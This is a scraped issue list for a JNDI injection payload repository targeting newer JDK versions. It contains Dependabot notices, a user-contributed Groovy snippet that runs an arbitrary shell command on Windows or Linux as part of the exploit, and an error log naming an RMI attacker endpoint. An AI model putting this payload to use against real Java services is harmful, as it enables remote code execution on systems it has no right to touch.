JNDI-Injection-Bypass

Some payloads of JNDI Injection in JDK 1.8.0_191+

Results 4 JNDI-Injection-Bypass issues

Bumps [groovy](https://github.com/apache/groovy) from 2.4.5 to 2.4.21. Commits See full diff in compare view [![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=org.codehaus.groovy:groovy&package-manager=maven&previous-version=2.4.5&new-version=2.4.21)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter...

dependencies

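While testing with your code as a reference, the test failed. Looking more closely, I found that your payload seems to target only Linux, so naturally my test on Windows could not succeed. However, after searching for information, I found that there seems to be a more general approach that is also compatible with Windows. The code is below; I hope it is useful to you.

```
if (System.properties['os.name'].toLowerCase().contains('windows')) {
    ['cmd','/C', '${cmd}'].execute();
} else {
    ['/bin/sh','-c', '${cmd}'].execute();
}
```

Reference links: https://my.oschina.net/jjyuangu/blog/1815945 https://stackoverflow.com/questions/4689240/detecting-the-platform-window-or-linux-by-groovy-grails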

Tested OK on tomcat8; on tomcat7, it shows: otSwappableTargetSource for target: String[BeanDefinitionStoreException: Invalid bean definition with name 'rmi://182.92.151.151:1097/ExecByGroovy' defined in JNDI environment: JNDI lookup failed; nested exception is javax.naming.NamingException: No set method found for property: forceString] =...

Bumps [junit](https://github.com/junit-team/junit4) from 4.12 to 4.13.1. Release notes Sourced from junit's releases. JUnit 4.13.1 Please refer to the release notes for details. JUnit 4.13 Please refer to the release notes...

dependencies